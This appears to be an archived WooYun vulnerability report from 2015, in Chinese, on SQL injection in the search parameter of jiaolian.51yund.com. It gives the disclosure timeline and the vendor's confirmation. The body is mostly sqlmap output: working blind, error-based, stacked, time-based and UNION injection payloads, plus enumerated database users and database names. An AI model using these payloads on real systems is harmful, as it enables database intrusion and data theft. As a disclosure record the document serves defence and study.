乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-18: 细节已通知厂商并且等待厂商处理中 2015-08-22: 厂商已经确认,细节仅向厂商公开 2015-09-01: 细节向核心白帽子及相关领域专家公开 2015-09-11: 细节向普通白帽子公开 2015-09-21: 细节向实习白帽子公开 2015-10-06: 细节向公众公开
yx支持union
1,http://jiaolian.51yund.com/ask/search?search=12,http://jiaolian.51yund.com/find/video?search=13,http://jiaolian.51yund.com/find/search?search=1123,属于一类,4&5,http://jiaolian.51yund.com/video/moreVideo/id/****/category_id/****
Parameter: search (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: search=1') AND 7328=7328 AND ('kjGJ' LIKE 'kjGJ Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: search=1') AND (SELECT 6185 FROM(SELECT COUNT(*),CONCAT(0x71786a7871,(SELECT (ELT(6185=6185,1))),0x716a717071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('VxBZ' LIKE 'VxBZ Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: search=1');(SELECT * FROM (SELECT(SLEEP(5)))XCWp)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: search=1') AND (SELECT * FROM (SELECT(SLEEP(5)))LYJP) AND ('idxx' LIKE 'idxx Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: search=1') UNION ALL SELECT CONCAT(0x71786a7871,0x63786249634563794c64,0x716a717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ---web application technology: PHP 5.4.37back-end DBMS: MySQL 5.0current user is DBA: Truedatabase management system users [3]:[*] 'root'@'127.0.0.1'[*] 'root'@'localhost'[*] 'root'@'OoH4X'available databases [8]:[*] faq_baidu[*] faq_baidu_new[*] information_schema[*] jiaolian[*] jiaolian1[*] lehuo_test[*] mysql[*] test
~~~
危害等级:低
漏洞Rank:5
确认时间:2015-08-22 23:02
漏洞已经确认。
暂无